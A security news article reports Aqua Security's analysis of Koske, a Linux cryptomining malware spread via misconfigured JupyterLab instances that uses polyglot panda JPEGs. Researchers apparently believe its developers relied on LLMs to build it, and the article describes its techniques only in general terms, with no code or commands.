Cybercriminals appear to have employed AI to a significant extent in the development of a sophisticated Linux malware named Koske, according to cloud and container security firm Aqua Security.
Koske is designed to abuse compromised systems for cryptocurrency mining. It deploys CPU- and GPU-optimized miners — depending on the device’s capabilities — to leverage the host’s resources to mine for Monero, Ravecoin, Nexa, Tari, Zano and a dozen other cryptocurrencies.
In attacks observed by Aqua, the malware has been distributed on misconfigured instances of the JupyterLab web-based development environment.
On compromised systems, the attackers install backdoors and download two apparently harmless JPEG image files.
These files are actually polyglots — when opened, they display an image of a panda, but they also embed malicious shellcode that fetches additional payloads, including a rootkit.
Aqua researchers believe Koske’s development has been significantly aided by AI. They believe the malware’s developers have used LLMs to create modular and evasive payloads, to design various persistence mechanisms that leave little trace, and ensure that the malware can automatically adapt to different system conditions.
In terms of adaptability, for instance, the malware uses three different methods to check if it has access to the GitHub account from which it fetches payloads. If it cannot connect, it resets proxy settings, removes iptables firewall rules on the operating system, and changes the DNS configuration. In addition, it can dynamically discover working proxies for C&C communications.
Aqua has determined that AI has likely been used to write Koske’s code based on several clues, including “verbose, well-structured comments and modularity” and “best-practice logic flow with defensive scripting habits”.
Another noteworthy aspect is that code written by AI can look generic and make attribution and analysis more difficult.
“While using AI to generate better code already poses a challenge for defenders, it’s only the beginning. The real game-changer is AI-powered malware, which is malicious software that dynamically interacts with AI models to adapt its behavior in real-time. This kind of capability could mark a meteoric leap in adversaries’ tactics, putting countless systems at serious risk,” Aqua Security warned.
Related: New ‘Auto-Color’ Linux Malware Targets North America, Asia
Related: New ‘Hadooken’ Linux Malware Targets WebLogic Servers
Related: Linux Malware Campaign Targets Misconfigured Cloud Servers
